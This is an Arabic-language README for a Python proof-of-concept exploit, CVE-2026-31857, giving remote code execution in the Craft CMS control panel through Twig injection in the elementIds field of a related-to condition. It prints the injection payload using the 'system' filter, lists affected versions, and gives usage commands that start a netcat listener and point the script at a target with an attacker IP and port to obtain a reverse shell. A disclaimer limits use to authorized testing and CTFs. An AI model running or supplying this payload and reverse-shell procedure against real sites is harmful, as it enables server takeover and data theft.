
Craft CMS RCE عبر الشروط العلائقية في لوحة التحكم
استغلال Python لثغرة RCE في لوحة تحكم Craft CMS، يتم تفعيلها عبر نقطة النهاية admin/actions/element-indexes/count-elements.
يتم الحقن عبر حقل elementIds الخاص بشرط RelatedToConditionRule، والذي يُفسَّر كـ Twig من جهة الخادم ويُستغل عبر فلتر system لتنفيذ أمر عشوائي ({{[['<cmd>']|filter('system')]}}).
تم الإفصاح عن الثغرة بواسطة NeoSprings
الإصدارات المتأثرة :
>= 5.0.0-RC1, <= 5.9.8>= 4.0.0-beta.1, <= 4.17.3المراجع :
$ git clone https://github.com/0xTatsuki/CVE-2026-31857.git
$ cd CVE-2026-31857
$ pip install -r requirements.txt
$ nc -lvnp <attacker_port>
$ python3 CVE-2026-31857.py -t http://<craftcms_base_url> -u <username> -p <password> -i <attacker_ip> -P <attacker_port>
تُقدَّم هذه الأداة لأغراض تعليمية وللتمارين المصرَّح بها فقط (CTF، اختبار اختراق متعاقد عليه أو اختبار محلي). استخدامها ضد أي نظام دون تصريح صريح يُعد غير قانوني.